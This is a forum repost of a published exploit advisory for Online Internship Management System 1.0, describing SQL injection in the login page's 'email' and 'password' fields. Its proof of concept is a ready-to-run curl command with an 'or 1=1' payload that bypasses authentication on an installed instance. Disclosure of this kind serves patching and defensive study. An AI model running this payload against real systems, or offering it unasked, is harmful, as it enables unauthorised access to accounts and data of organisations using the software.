Jump to content

Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass

This CHT

By This CHT,
in CHT Vulnerability database

Recommended Posts

This CHT Grand Master

This CHT

Posted
  • Group:  The leader of the
  • Content Count:  4,798
  • Achievement Points:  31,702
  • With Us For:  244 Days
  • Status:  Offline
  • Last Seen:  
  • Device:  Windows
Posted 
# Exploit Title: Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass
# Date: 16-02-2021
# Exploit Author: Christian Vierschilling
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14712/online-internship-management-system-phpmysqli-full-source-code.html
# Version: 1.0
# Tested on: PHP 7.4.14, Linux x64_x86


# --- Description --- #

The application contains sql injections in the parameters 'email' and 'password' in the file 'login.php'. 

# --- Proof of concept --- #

Curl request for authentication bypass via sql injection in parameter 'email':

curl http://x.x.x.x/internship/login.php --data "email='%20or%201=1;#&password=none&login="
Link to comment
Share on other sites
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...